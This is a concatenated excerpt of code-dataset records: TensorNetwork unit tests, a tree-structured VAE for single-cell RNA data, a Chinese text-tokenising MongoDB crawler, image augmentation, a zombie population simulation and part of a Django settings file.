test_node_magic_lt_raises_error_not_node(single_node_edge):\n node = single_node_edge.node\n with pytest.raises(ValueError):\n assert node < 0\n\n\ndef test_node_magic_matmul_raises_error_not_node(single_node_edge):\n node = single_node_edge.node\n with pytest.raises(TypeError):\n assert node @ 0\n\n\ndef test_node_magic_matmul_raises_error_different_network(single_node_edge):\n node = single_node_edge.node\n net = tensornetwork.TensorNetwork(backend=node.network.backend.name)\n tensor = net.backend.convert_to_tensor(np.zeros((1, 2, 3)))\n node2 = Node(\n tensor=tensor, name=\"test\", axis_names=[\"A\", \"B\", \"C\"], network=net)\n with pytest.raises(ValueError):\n assert node @ node2\n\n\ndef test_node_magic_matmul(backend):\n net = tensornetwork.TensorNetwork(backend=backend)\n tensor1 = net.backend.convert_to_tensor(np.ones((2, 3, 4, 5)))\n tensor2 = net.backend.convert_to_tensor(2 * np.ones((3, 5, 4, 2)))\n node1 = net.add_node(tensor1)\n node2 = net.add_node(tensor2)\n net.connect(node1[0], node2[3])\n net.connect(node2[1], node1[3])\n net.connect(node1[1], node2[0])\n actual = (node1 @ node2)\n expected = np.array([[60, 60, 60, 60], [60, 60, 60, 60], [60, 60, 60, 60],\n [60, 60, 60, 60]])\n assert isinstance(actual, Node)\n np.testing.assert_allclose(actual.tensor, expected)\n\n\ndef test_edge_initialize_dangling(single_node_edge):\n node = single_node_edge.node\n edge = single_node_edge.edge\n assert edge.name == \"edge\"\n assert edge.node1 == node\n assert edge.axis1 == 0\n assert edge.node2 is None\n assert edge.axis2 is None\n assert edge.is_dangling() is True\n assert edge.signature == -1\n\n\ndef test_edge_initialize_nondangling(double_node_edge):\n node1 = double_node_edge.node1\n node2 = double_node_edge.node2\n edge = double_node_edge.edge12\n assert edge.name == \"edge\"\n assert edge.node1 == node1\n assert edge.axis1 == 1\n assert edge.node2 == node2\n assert edge.axis2 == 1\n assert edge.is_dangling() is False\n assert edge.signature == -1\n\n\ndef test_edge_initialize_raises_error_faulty_arguments(double_node_edge):\n node1 = double_node_edge.node1\n node2 = double_node_edge.node2\n with pytest.raises(ValueError):\n Edge(name=\"edge\", node1=node1, node2=node2, axis1=0)\n with pytest.raises(ValueError):\n Edge(name=\"edge\", node1=node1, axis1=0, axis2=0)\n\n\ndef test_edge_set_signature(double_node_edge):\n edge = double_node_edge.edge12\n edge.set_signature(2)\n assert edge.signature == 2\n\n\ndef test_edge_set_signature_raises_error_dangling(single_node_edge):\n edge = single_node_edge.edge\n with pytest.raises(ValueError):\n edge.set_signature(2)\n\n\ndef test_edge_get_nodes_single(single_node_edge):\n node = single_node_edge.node\n edge = single_node_edge.edge\n assert edge.get_nodes() == [node, None]\n\n\ndef test_edge_get_nodes_double(double_node_edge):\n node1 = double_node_edge.node1\n node2 = double_node_edge.node2\n edge = double_node_edge.edge12\n assert edge.get_nodes() == [node1, node2]\n\n\ndef test_edge_update_axis(double_node_edge):\n node1 = double_node_edge.node1\n node2 = double_node_edge.node2\n edge = double_node_edge.edge1\n edge.update_axis(old_axis=0, old_node=node1, new_axis=2, new_node=node2)\n assert edge.node1 == node2\n assert edge.axis1 == 2\n\n\ndef test_edge_update_axis_raises_error_old_node(double_node_edge):\n node2 = double_node_edge.node2\n edge = double_node_edge.edge1\n with pytest.raises(ValueError):\n edge.update_axis(old_axis=0, old_node=node2, new_axis=2, new_node=node2)\n\n\ndef test_edge_node1_property(single_node_edge):\n node = single_node_edge.node\n edge = single_node_edge.edge\n assert edge.node1 == node\n\n\ndef test_edge_node1_setter(double_node_edge):\n node2 = double_node_edge.node2\n edge = double_node_edge.edge1\n edge.node1 = node2\n assert edge.node1 == node2\n\n\ndef test_edge_node2_property(double_node_edge):\n node2 = double_node_edge.node2\n edge1 = double_node_edge.edge1\n edge12 = double_node_edge.edge12\n assert edge1.node2 is None\n assert edge12.node2 == node2\n\n\ndef test_edge_node2_setter(double_node_edge):\n node1 = double_node_edge.node1\n edge12 = double_node_edge.edge12\n edge12.node2 = node1\n assert edge12.node2 == node1\n\n\ndef test_edge_dimension(single_node_edge):\n edge = single_node_edge.edge\n assert edge.dimension == 1\n\n\ndef test_edge_is_dangling(double_node_edge):\n edge1 = double_node_edge.edge1\n edge12 = double_node_edge.edge12\n assert edge1.is_dangling()\n assert not edge12.is_dangling()\n\n\ndef test_edge_is_trace_true(single_node_edge):\n node = single_node_edge.node\n edge = Edge(name=\"edge\", node1=node, axis1=1, node2=node, axis2=2)\n assert edge.is_trace()\n\n\ndef test_edge_is_trace_false(double_node_edge):\n edge1 = double_node_edge.edge1\n edge12 = double_node_edge.edge12\n assert not edge1.is_trace()\n assert not edge12.is_trace()\n\n\ndef test_edge_is_being_used_true(double_node_edge):\n node1 = double_node_edge.node1\n assert node1.get_all_edges()[0].is_being_used()\n assert node1.get_all_edges()[1].is_being_used()\n\n\ndef test_edge_is_being_used_false(single_node_edge):\n node = single_node_edge.node\n edge2 = Edge(name=\"edge\", node1=node, axis1=0)\n assert not edge2.is_being_used()\n\n\ndef test_edge_set_name(single_node_edge):\n edge = single_node_edge.edge\n edge.set_name('new_name')\n assert edge.name == 'new_name'\n\n\ndef test_edge_magic_xor(double_node_edge):\n node1 = double_node_edge.node1\n node2 = double_node_edge.node2\n edge1 = Edge(name=\"edge1\", node1=node1, axis1=2)\n edge2 = Edge(name=\"edge2\", node1=node2, axis1=2)\n edge = edge1 ^ edge2\n assert edge.node1 == node1\n assert edge.node2 == node2\n\n\ndef test_edge_magic_lt_raise_error_type(single_node_edge):\n edge = single_node_edge.edge\n with pytest.raises(TypeError):\n assert edge < 0\n\n\ndef test_edge_magic_lt(double_node_edge):\n edge1 = double_node_edge.edge1\n edge2 = double_node_edge.edge12\n assert (edge1 < edge2) == (edge1.signature < edge2.signature)\n\n\ndef test_edge_magic_str(single_node_edge):\n edge = single_node_edge.edge\n assert str(edge) == edge.name\n","sub_path":"tensornetwork/network_components_test.py","file_name":"network_components_test.py","file_ext":"py","file_size_in_byte":12401,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"337398460","text":"# -*- coding: utf-8 -*-\n\"\"\"Main module.\"\"\"\n\nimport torch\nimport torch.nn as nn\nimport torch.nn.functional as F\nfrom torch.distributions import Normal\nfrom ..models.modules import Encoder, Decoder, LinearDecoder\nfrom ..models.utils import one_hot\nimport copy\nimport numpy as np\nfrom torch.distributions import Normal, Poisson\nfrom torch.distributions import kl_divergence as kl\nfrom ..models.distributions import NegativeBinomial\n\ntorch.backends.cudnn.benchmark = True\n\nfrom ete3 import Tree\n\n# TreeVAE Model\nclass TreeVAE(nn.Module):\n r\"\"\"Model class for fitting a VAE to scRNA-seq data with a tree prior.\n\n This is corresponding VAE class for our TreeTrainer & implements the TreeVAE model. This model\n performs training in a very specific way, in an effort to respect the tree structure. Specifically,\n we'll perform training of this model by identifying 'clades' (or groups of leaves underneath a given\n internal node) from which the cell's RNA-seq data is assumed to be iid. This is currently done crudely\n by treating every internal node at depth 3 from the root as an appropriate location to create a clade,\n though this should be improved (see TODOs).\n\n After creating a clustered subtree (where now the leaves correspond to the nodes where clades were induced),\n our training procedure is relativley simple. For every one of these new leaves, split the cells in this clade\n into train/test/validation and in each iteration sample a single cell from the appropriate list and assign its\n RNAseq profile to the clade's root (i.e., the leaf in the clusterd subtree).\n\n\t\"\"\"\n\n def __init__(\n self,\n n_input: int,\n n_labels: int = 0,\n n_hidden: int = 128,\n n_latent: int = 10,\n n_layers: int = 1,\n dropout_rate: float = 0.1,\n dispersion: str = \"gene\",\n reconstruction_loss: str = \"nb\",\n latent_distribution: str = \"normal\",\n tree: Tree = None,\n use_clades: bool = False,\n prior_t: dict or float = None,\n ldvae: bool = False,\n use_MP: bool = True\n ):\n\n super().__init__()\n self.use_MP = use_MP\n self.dispersion = dispersion\n self.n_latent = n_latent\n self.reconstruction_loss = reconstruction_loss\n self.n_labels = n_labels\n self.latent_distribution = latent_distribution\n\n if self.dispersion == \"gene\":\n self.px_r = torch.nn.Parameter(torch.randn(n_input))\n\n # z encoder goes from the n_input-dimensional data to an n_latent-d latent space representation\n self.z_encoder = Encoder(\n n_input,\n n_latent,\n n_layers=n_layers,\n n_hidden=n_hidden,\n dropout_rate=dropout_rate,\n distribution=latent_distribution,\n )\n\n # decoder goes from n_latent-dimensional space to n_input-d data\n self.ldvae = ldvae\n if not self.ldvae:\n self.decoder = Decoder(\n n_latent,\n n_input,\n n_layers=n_layers,\n n_hidden=n_hidden,\n )\n else:\n # linearly decoded VAE\n if self.ldvae:\n self.decoder = LinearDecoder(\n n_input=n_latent,\n n_output=n_input,\n use_batch_norm=False,\n bias=True\n )\n\n def cut_tree(node, distance):\n return node.distance == distance\n\n self.use_clades = use_clades\n leaves = [n for n in tree.traverse('levelorder') if n.is_leaf()]\n \n if self.use_clades:\n # Cluster tree into clades: After a certain depth (here = 3), all children nodes are assumed iid and grouped into\n # \"clades\", for the training we sample one instance of each clade.\n collapsed_tree = Tree(tree.write(is_leaf_fn=lambda x: cut_tree(x, 3)))\n for l in collapsed_tree.get_leaves():\n l.cells = tree.search_nodes(name=l.name)[0].get_leaf_names()\n self.root = collapsed_tree.name\n inf_tree = Tree(\"prior_root;\")\n inf_tree.add_child(collapsed_tree)\n else:\n # No collapsing for simulations (and small trees)\n for l in leaves:\n l.cells = tree.search_nodes(name=l.name)[0].get_leaf_names()\n self.root = tree.name\n # add prior node\n inf_tree = Tree(\"prior_root;\")\n inf_tree.add_child(tree)\n\n self.prior_root = inf_tree.name\n self.tree = inf_tree\n\n # leaves barcodes\n self.barcodes = [l.name for l in leaves]\n\n # branch length for Message Passing\n if not prior_t:\n prior_t = 1.0\n if type(prior_t) == float:\n self.prior_t = {}\n for n in self.tree.traverse('levelorder'):\n if n.is_root():\n self.prior_t[n.name] = 0.0\n else:\n self.prior_t[n.name] = prior_t\n self.prior_t['prior_root'] = 1.0\n else:\n self.prior_t = prior_t\n\n # encoder's variance\n self.encoder_variance = []\n\n def initialize_messages(self, evidence, barcodes, d):\n\n if type(evidence) == np.ndarray:\n evidence = torch.from_numpy(evidence)\n\n dic_nu = {}\n dic_mu = {}\n dic_log_z = {}\n\n for i, j in enumerate(evidence):\n dic_nu[barcodes[i]] = 0\n dic_log_z[barcodes[i]] = 0\n dic_mu[barcodes[i]] = j\n\n dic_nu[self.prior_root] = 0\n dic_mu[self.prior_root] = torch.zeros(d)\n dic_log_z[self.prior_root] = 0\n\n for n in self.tree.traverse('levelorder'):\n if n.name in dic_nu:\n n.add_features(\n nu=dic_nu[n.name],\n mu=dic_mu[n.name].type(torch.DoubleTensor),\n log_z=dic_log_z[n.name],\n )\n else:\n n.add_features(\n nu=0,\n mu=torch.from_numpy(np.zeros(d)).type(torch.DoubleTensor),\n log_z=0,\n )\n\n def initialize_visit(self):\n for node in self.tree.traverse():\n node.add_features(visited=False)\n\n def perform_message_passing(self, root_node, d, include_prior):\n # flag the node as visited\n prior_node = self.tree & self.prior_root\n root_node.visited = True\n\n incoming_messages = []\n incident_nodes = [c for c in root_node.children]\n if not root_node.is_root():\n incident_nodes += [root_node.up]\n\n # get list of neighbors that are not visited yet\n for node in incident_nodes:\n if node.name == 'prior_root':\n node = prior_node\n if not node.visited and (\n node != prior_node or (node == prior_node and include_prior)\n ):\n self.perform_message_passing(node, d, include_prior)\n incoming_messages.append(node)\n\n n = len(incoming_messages)\n\n # collect and return\n if n == 0:\n # nothing to do. This happens on the leaves\n return None\n\n elif n == 1:\n k = incoming_messages[0]\n root_node.nu = k.nu + self.prior_t[k.name]\n root_node.mu = k.mu\n root_node.log_z = 0\n\n elif n == 2:\n # let us give them arbitrary names k and l (could be left and right)\n k = incoming_messages[0]\n l = incoming_messages[1]\n\n # let us compute the updates\n k_nu_inc = k.nu + self.prior_t[k.name]\n l_nu_inc = l.nu + self.prior_t[l.name]\n\n root_node.nu = 1. / (1. / k_nu_inc + 1. / l_nu_inc)\n root_node.mu = k.mu / k_nu_inc + l.mu / l_nu_inc\n root_node.mu *= root_node.nu\n\n lambda_ = k_nu_inc + l_nu_inc\n root_node.log_z = -0.5 * torch.sum((k.mu - l.mu) ** 2) / lambda_\n root_node.log_z -= d * 0.5 * np.log(2 * np.pi * lambda_)\n\n\n elif n > 2:\n # we will keep track of mean and variances of the children nodes in 2 lists\n children_nu = [0] * n\n children_mu = [0] * n\n\n for i in range(n):\n k = incoming_messages[i]\n # nu\n children_nu[i] = k.nu + self.prior_t[k.name]\n if children_nu[i] != 0:\n root_node.nu += 1. / children_nu[i]\n # mu\n children_mu[i] = k.mu / children_nu[i]\n else:\n children_mu[i] = k.mu\n root_node.mu += children_mu[i]\n\n if root_node.nu != 0:\n root_node.nu = 1. / root_node.nu\n root_node.mu *= root_node.nu\n\n def product_without(L, exclude):\n \"\"\"\n L: list of elements\n exclude: list of the elements indices to exlucde\n\n returns: product of all desired array elements\n \"\"\"\n prod = 1\n for idx, x in enumerate(L):\n if idx in exclude:\n continue\n else:\n prod *= x\n return prod\n\n\n # find t\n t = 0\n for excluded_idx in range(n):\n prod = product_without(children_nu, [excluded_idx])\n t += prod\n\n # normalizing constants\n Z_1 = -0.5 * (n - 1) * d * np.log(2 * np.pi)\n Z_2 = -0.5 * d * np.log(t)\n Z_3 = 0\n\n # nested for loop --> need to optimize with numba jit\n visited = set()\n for j in range(n):\n for h in range(n):\n if h == j:\n continue\n if (h, j) in visited or(j, h) in visited:\n continue\n else:\n prod_2 = product_without(children_nu, [j, h])\n visited.add((j, h))\n k = incoming_messages[h]\n l = incoming_messages[j]\n Z_3 += prod_2 * torch.sum((k.mu - l.mu) ** 2)\n if t != 0:\n Z_3 *= -0.5 / t\n root_node.log_z = Z_1 + Z_2 + Z_3\n\n def aggregate_messages_into_leaves_likelihood(self, d, add_prior):\n res = 0\n root_node = self.tree & self.root\n\n # agg Z messages\n for node in self.tree.traverse():\n res += node.log_z\n\n if add_prior:\n # add prior\n nu_inc = 1.0 + root_node.nu\n res += -0.5 * torch.sum(root_node.mu ** 2) / nu_inc - d * 0.5 * np.log(2 * np.pi * nu_inc)\n \n # prior likelihood of the leaves p(z_1, ..., z_L) \\sim Normal(0, Sigma_L)\n return res\n\n def posterior_predictive_density(self, query_node, evidence=None):\n \"\"\"\n :param query_node: (string) barcode of a query node\n evidence: (ndarray) observation values at the leaves (used as an initialization)\n reroot_prior_t: (dict) branch lengths dictionnary of the rerooted tree\n :return: the expectation and the variance for the posterior (distribution query_node | observations)\n \"\"\"\n\n root_node = self.tree & self.root\n\n # computing branch length dictionnary of rerooted tree:\n def reroot_tree(branch_length, node):\n # path from node to root\n path = []\n internal_node = copy.copy(node)\n while internal_node.up:\n path.append(internal_node)\n internal_node = internal_node.up\n\n # New branch length dictionnary\n new_branch_length = copy.copy(branch_length)\n new_branch_length[node.name] = 0.0\n\n # correct branch lengths to make 'node' the root\n for i in range(len(path) - 1):\n current_node = path[i].name\n next_node = path[i+1].name\n new_branch_length[next_node] = branch_length[current_node]\n\n return new_branch_length\n \n # Update branch length\n old_prior_t = copy.copy(self.prior_t)\n self.prior_t = reroot_tree(self.prior_t, query_node)\n\n # Message Passing\n self.initialize_visit()\n if evidence is not None:\n self.initialize_messages(evidence,\n self.barcodes,\n self.n_latent\n )\n\n self.perform_message_passing(self.tree & query_node.name, len(root_node.mu), True)\n\n # Update branch length \n self.prior_t = old_prior_t\n\n return (self.tree & query_node.name).mu, (self.tree & query_node.name).nu\n\n def sample_from_posterior_z(self, x, give_mean=False, give_cov=False, n_samples=5000):\n \"\"\"Samples the tensor of latent values from the posterior\n\n Parameters\n ----------\n x\n tensor of values with shape ``(batch_size, n_input)``\n give_mean\n is True when we want the mean of the posterior distribution rather than sampling (Default value = False)\n n_samples\n how many MC samples to average over for transformed mean (Default value = 5000)\n\n Returns\n -------\n type\n tensor of shape ``(batch_size, n_latent)``\n\n \"\"\"\n x = torch.log(1 + x)\n qz_m, qz_v, z = self.z_encoder(x)\n if not give_mean:\n samples = Normal(qz_m, qz_v.sqrt()).sample([n_samples])\n z = torch.mean(samples, dim=0)\n else:\n z = qz_m\n if give_cov:\n return z, qz_v\n else:\n return z\n \n def inference(self, x, n_samples=1):\n \"\"\"Helper function used in forward pass\n \"\"\"\n x_ = x\n x_ = torch.log(1 + x_)\n\n # Sampling\n qz_m, qz_v, z = self.z_encoder(x=x_)\n\n if n_samples > 1:\n qz_m = qz_m.unsqueeze(0).expand((n_samples, qz_m.size(0), qz_m.size(1)))\n qz_v = qz_v.unsqueeze(0).expand((n_samples, qz_v.size(0), qz_v.size(1)))\n # when z is normal, untran_z == z\n z = Normal(qz_m, qz_v.sqrt()).sample()\n\n # Library size fixed\n total_counts = x.sum(dim=1, dtype=torch.float64)\n library = torch.log(total_counts).view(-1, 1)\n\n if self.ldvae:\n px_scale, px_rate, raw_px_scale = self.decoder(\n self.dispersion, z, library\n )\n px_rate = torch.clamp(torch.exp(raw_px_scale), max=5000)\n else:\n px_scale, px_rate, _ = self.decoder(\n self.dispersion, z, library\n )\n\n if self.dispersion == \"gene\":\n px_r = self.px_r\n px_r = torch.exp(self.px_r)\n\n return dict(\n px_scale=px_scale,\n px_r=px_r,\n px_rate=px_rate,\n qz_m=qz_m,\n qz_v=qz_v,\n z=z,\n library=library,\n )\n\n def forward(self, x):\n r\"\"\" Returns the reconstruction loss\n\n\t\t:param x: tensor of values with shape (batch_size, n_input)\n\n\t\t:return: the reconstruction loss and the Kullback divergences\n\t\t:rtype: 2-tuple of :py:class:`torch.FloatTensor`\n\t\t\"\"\"\n # Parameters for z latent distribution\n outputs = self.inference(x)\n qz_m = outputs[\"qz_m\"]\n qz_v = outputs[\"qz_v\"]\n px_rate = outputs[\"px_rate\"]\n px_r = outputs[\"px_r\"]\n z = outputs[\"z\"]\n library = outputs[\"library\"]\n\n self.encoder_variance.append(np.linalg.norm(qz_v.detach().cpu().numpy(), axis=1))\n \n if self.use_MP:\n # Message passing likelihood\n self.initialize_visit()\n self.initialize_messages(z, self.barcodes, self.n_latent)\n self.perform_message_passing((self.tree & self.root), z.shape[1], False)\n mp_lik = self.aggregate_messages_into_leaves_likelihood(z.shape[1], add_prior=True)\n # Gaussian variational likelihood\n qz = Normal(qz_m, torch.sqrt(qz_v)).log_prob(z).sum(dim=-1)\n else:\n mp_lik = None\n # scVI Kl Divergence\n mean = torch.zeros_like(qz_m)\n scale = torch.ones_like(qz_v)\n qz = kl(Normal(qz_m, torch.sqrt(qz_v)), Normal(mean, scale)).sum(dim=1)\n \n # Reconstruction Loss\n if self.reconstruction_loss == \"nb\":\n reconst_loss = (\n -NegativeBinomial(mu=px_rate, theta=px_r).log_prob(x).sum(dim=-1)\n )\n elif self.reconstruction_loss == \"poisson\":\n reconst_loss = -Poisson(px_rate).log_prob(x).sum(dim=-1)\n\n return reconst_loss, qz, mp_lik\n","sub_path":"scvi/external/models/treevae.py","file_name":"treevae.py","file_ext":"py","file_size_in_byte":16820,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"407009321","text":"import re\nimport sys\nimport json\nimport requests\nimport string\nimport datetime\nimport time\nfrom time import sleep\nfrom bs4 import BeautifulSoup\nfrom pymongo import MongoClient\nfrom pymongo import errors\nimport urllib3\nfrom io import StringIO\n\n#set mongo connection\nmongoURI = \"mongodb://localhost:27017/\"\nurl = 'http://140.117.69.70:8787/tokenize'\nurl_jieba = 'http://140.117.69.70:8787/jieba-token'\nurl_stanford = 'http://140.117.69.70:8787/stanford-token'\nurl_postagger1 = 'http://140.117.69.70:8787/postagger1'\n\n#使用以下幾個note進行斷句\nspliter = [\",\",\"!\",\"!\",\"。\",\"?\",\"?\",\",\"]\n\ntry:\n client = MongoClient(mongoURI)\n #client = MongoClient('localhost', 27017)\n #print(client.server_info())\n db = client.project\nexcept:\n #errors.ConnectionFailure as err:\n print(\"err\")\n\n\ndef part2():\n for record in db.all_1109.find({}):\n # count = 0\n # count = count + 1\n # print(count)\n\n try:\n result = record['result']\n continue\n except KeyError:\n print(\"\")\n \n # result = record['result']\n # if result is not None:\n # continue\n \n try:\n content = record['artContent'].strip()\n except:\n content = record['artContent']\n #print(document['artContent'])\n #傳進去api時,一定要做sub以下處理\n content = re.sub(\"[\\s+<>|`\\\\.·\\/_$%;:^*(+\\\"\\']+|[『』{}=+——\\]\\[、~@#¥%……&*():;《)《》“”()»〔〕-]+\",\"\",content)\n \n input_text = {\n 'note':spliter,\n 'article':content\n }\n\n # to print input string\n # print('Input:')\n # print(input_text)\n\n r = requests.post(url, json = input_text)\n article_url = record['artUrl']\n \n io = StringIO(r.text)\n output_text = json.load(io)\n \n result_update = list()\n\n # to eliminate the string in \"eliminate_list\" list \n for element in output_text['result']:\n sentence = ''\n # to find each character\n for word in element:\n sentence += word\n #------------------Jieba Start-----------------\n sen = list()\n sen.append(sentence)\n\n input_text = {\n 'sen':sen,\n }\n # print(input_text)\n r = requests.post(url_jieba, json = input_text)\n\n io = StringIO(r.text)\n output_text = json.load(io)\n # print(output_text)\n\n jieba = output_text['token']\n Jieba_Seg = []\n for i in jieba[0]:\n Jieba_Seg.append(i)\n # print(Jieba_Seg)\n #-------------------Jieba End--------------------\n # temp = {'sentence' : sentence, 'Jieba_Seg': Jieba_Seg}\n # append a dictionary in \"result_update\" list\n # result_update.append(temp)\n \n #------------------StanFord Start-----------------\n # sf_sen = list()\n # sf_sen.append(sentence)\n\n # sf_input_text = {\n # 'sen':sf_sen,\n # }\n # print(sf_input_text)\n # sf_r = requests.post(url_stanford, json = sf_input_text)\n\n # sf_io = StringIO(sf_r.text)\n # print(sf_io)\n # sf_output_text = json.load(sf_io)\n # print(sf_output_text)\n\n # stanFord = sf_output_text['token']\n # sf_Seg = []\n # postagger_input = []\n # for i in stanFord[0]:\n # sf_Seg.append(i)\n # print(sf_Seg)\n #-------------------StanFord End--------------------\n #-------------------Postagger Start-----------------\n pos_input_text = {\n 'name':Jieba_Seg,\n }\n # print(pos_input_text)\n pos_r = requests.post(url_postagger1, json = pos_input_text)\n\n pos_io = StringIO(pos_r.text)\n pos_output_text = json.load(pos_io)\n pos_result = list()\n\n for i in pos_output_text:\n for j in i:\n pos_result.append(j)\n\n # print(pos_output_text)\n print(pos_output_text)\n\n temp = {'sentence' : sentence, 'Jieba_Seg': Jieba_Seg, 'Postagger':pos_result}\n # print(temp)\n\n # append a dictionary in \"result_update\" list\n result_update.append(temp)\n\n # to print result\n print('Output:')\n print(result_update)\n\n # update target\n \n db.all_1109.update(\n { 'artUrl' : article_url },\n { '$set' : {\n 'result': result_update ,\n }\n }, upsert = True, multi=True\n )\n \n print(\"Update Sucessfully!\")\n\n\ndef main():\n\tpart2()\n\nif __name__==\"__main__\":\n main()","sub_path":"crawler_nlp.py","file_name":"crawler_nlp.py","file_ext":"py","file_size_in_byte":4929,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"298432648","text":"'''\nData Augmentation\n'''\n\nimport cv2 as cv\nimport numpy as np\nimport imgaug as ia\nimport imgaug.augmenters as iaa\n\n\nprint(ia.__version__)\n\ndef myDataAug(X_data, Y_data, its, seed=12):\n size = len(X_data)\n ia.seed(seed)\n\n seq = iaa.Sequential([\n iaa.GaussianBlur(sigma=(0.0, 4.0)), #Random GaussianBlur from sigma 0 to 4\n #iaa.AddToHueAndSaturation((-10, 10), per_channel=True), #color jittering\n iaa.Affine(translate_percent={\"x\": (-0.1, 0.1), \"y\": (-0.1, 0.1)}), #affine transalte (affects segmaps)\n iaa.Fliplr(0.5), #50 % to flip horizontally (affects segmaps)\n iaa.Flipud(0.5), #50 % to flip vertically (affects segmaps)\n iaa.Rotate((-45, 45)) # rotate by -45 to 45 degrees (affects segmaps)\n ], random_order=True)\n\n X_data_augs = np.zeros((its*size, 1000, 1000, 3), dtype=np.uint8)\n Y_data_augs = np.zeros((its*size, 1000, 1000, 3), dtype=np.uint8)\n\n for i in range(its):\n X_data_aug, Y_data_aug = seq(images=X_data, segmentation_maps=Y_data)\n X_data_augs[i*size: (i+1)*size] = X_data_aug\n Y_data_augs[i*size: (i+1)*size] = Y_data_aug\n\n return X_data_augs, Y_data_augs\n","sub_path":"libs/dataAug.py","file_name":"dataAug.py","file_ext":"py","file_size_in_byte":1199,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"228464515","text":"import os, sys\nfrom include.utils import load_config, dict2\nfrom include.common import home\n\ne=sys.exit\n\n\n\n\n\nclass Layout(object): \n\tdef __init__(self, layout_loc):\n\t\tglobal cfg\n\t\tself.layout_loc=layout_loc\n\t\tself.layout_fn=os.path.basename(layout_loc)\n\t\tself.layout_name = os.path.splitext(self.layout_fn)[0]\n\t\tself.cfg = cfg = load_config(config_path = layout_loc)\n\t\t\n\tdef get(self, key, default = None):\n\t\treturn cfg.get(key, default)\n\t\t\n\tdef items(self, pref=None):\n\t\tfor key, val in cfg.items():\n\t\t\tprint(key)\n\t\t\tyield (key, val)\n\n\n","sub_path":"include/Layout.py","file_name":"Layout.py","file_ext":"py","file_size_in_byte":538,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"601770956","text":"from pylab import *\r\n\r\ninnvandring = 0.1\r\ndeath = 0.03\r\nmedisiner = 0.9 #medisiner sinker dødsraten med 10%\r\nt0 = 0\r\nstart_mennesker = 500\r\nstart_zombie = 100\r\nvekst = innvandring - death \r\nhyppigheten = 0.0004\r\nsjanse_død = 0.2 #0.2 fordi det er 20% sjanse på at et menneske dør når den møter på en zombie\r\nsjanse_smitta = 0.3 # 0.3 fordi man har 30% sjanser på at man blir smitta når man møter på en zombie\r\nsjanse_drap = 0.1 #sjanse for å drepe zombie \r\nantall_forsterkninger = 250\r\nbefolknings_grense = 1000 #Hvis befolkningen dropper under 1000 sa kommer forstarkninger\r\nantall = 0\r\ntrening = 0.1\r\n\r\nN = 100000\r\ntid = 100\r\ndt = tid/(N-1)\r\n\r\nt = zeros(N)\r\nP = zeros(N)\r\nZ = zeros(N)\r\nPder = zeros(N)\r\nZder = zeros(N)\r\nD = zeros(N) #Møter mellom mennesker og Zombie\r\nPu = zeros(N) #Populasjon av menneseker uten zombie\r\nPuDer = zeros(N) \r\n# Dder = zeros(N)\r\n\r\ndef forsterkninger():\r\n global sjanse_død\r\n global sjanse_drap\r\n global death\r\n sjanse_død = sjanse_død * 0.5\r\n sjanse_drap = sjanse_drap * 1.5\r\n death = death * medisiner\r\n vekst = innvandring - death \r\n \r\nt[0] = t0\r\nP[0] = start_mennesker\r\nZ[0] = start_zombie\r\nD[0] = 0 #Hvor mange som dør pga. Zombie \r\nPu[0] = start_mennesker \r\n# Dder[0] = 0\r\nfor i in range (N-1):\r\n Pder[i] = vekst * P[i] * (1-P[i]/20000) - (hyppigheten * P[i] * Z[i])*sjanse_død \r\n Zder[i] = (D[i] * sjanse_smitta) - (D[i] * (sjanse_drap + trening))\r\n PuDer[i] = vekst * P[i] * (1-P[i]/20000)\r\n # Dder[i+1] = (D[i+1] - D[i]) / (t[i+1] - t[i])\r\n D[i+1] = (Pu[i] + PuDer[i] * dt) - (P[i] + Pder[i] * dt)\r\n Pu[i+1] = Pu[i] + PuDer[i] * dt \r\n P[i+1] = P[i] + Pder[i] * dt\r\n \r\n if P[i+1] < P[i] and P[i] <= 1000 and antall < 2 : #Forsterkninger kan komme max to ganger \r\n P[i+1] = P[i] + antall_forsterkninger\r\n forsterkninger()\r\n antall += 1\r\n \r\n Z[i+1] = Z[i] + Zder[i]*dt \r\n t[i+1] = t[i] + dt\r\n \r\n if Z[i] <= 0:\r\n Z[i+1] = (Z[i] + Zder[i]*dt) * 0\r\n \r\n if death < 0.03:\r\n medisiner = medisiner * 1.001\r\n \r\n \r\n#Plotter befolkningsvekst\r\nplot(t,P, label='Mennesker')\r\nplot(t,Z, label='Zombie') \r\ngrid()\r\nlegend()\r\ntitle(\"Populasjon\")\r\nxlabel(\"År\")\r\nylabel(\"Populasjon\")\r\nshow()\r\n\r\n#Plotter hvor mange som dør pga. Zombie\r\nplot(t,M)\r\ngrid()\r\ntitle(\"Død pga. Zombie\")\r\nxlabel(\"År\")\r\nylabel(\"Populasjon\")\r\nshow()\r\n\r\n\r\n","sub_path":"zombie greia.py","file_name":"zombie greia.py","file_ext":"py","file_size_in_byte":2397,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"534884005","text":"# Django settings for whwn project.\nimport os\nimport sys\nimport json\n\ndef project(*args):\n path = os.path.join(os.path.dirname(__file__), \"../\")\n file_path = os.path.realpath(path)\n return os.path.join(file_path, *args)\n\nADMINS = (\n ('WeHave-WeNeed', 'admin@wehave-weneed.org'),\n)\n\n# Celery\nimport djcelery\ndjcelery.setup_loader()\n\nCELERY_QUEUES = {\n 'default': {\n 'exchange': 'default',\n 'exchange_type': 'topic',\n 'binding_key': 'tasks.#',\n }\n}\nCELERY_DEFAULT_QUEUE = \"default\"\nCELERY_IMPORTS = (\"whwn.tasks\",)\n\nHAYSTACK_SIGNAL_PROCESSOR = 'haystack.signals.RealtimeSignalProcessor'\n\n# Registration options\nACCOUNT_ACTIVATION_DAYS = 7\n\nMANAGERS = ADMINS\n\nDATETIME_FORMAT = \"U\"\n\nTIME_ZONE = 'America/Los_Angeles'\nLANGUAGE_CODE = 'en-us'\nUSE_I18N = True\nUSE_L10N = False\n\n# Custom WHWN Authentication Backend. Look at\n# whwn/auth_backends.py for more information.\nAUTHENTICATION_BACKENDS = (\n 'whwn.auth_backends.WHWNUserAuthBackend',\n)\n\n# URL that handles the media served from MEDIA_ROOT. Make sure to use a\n# trailing slash.\n# Examples: 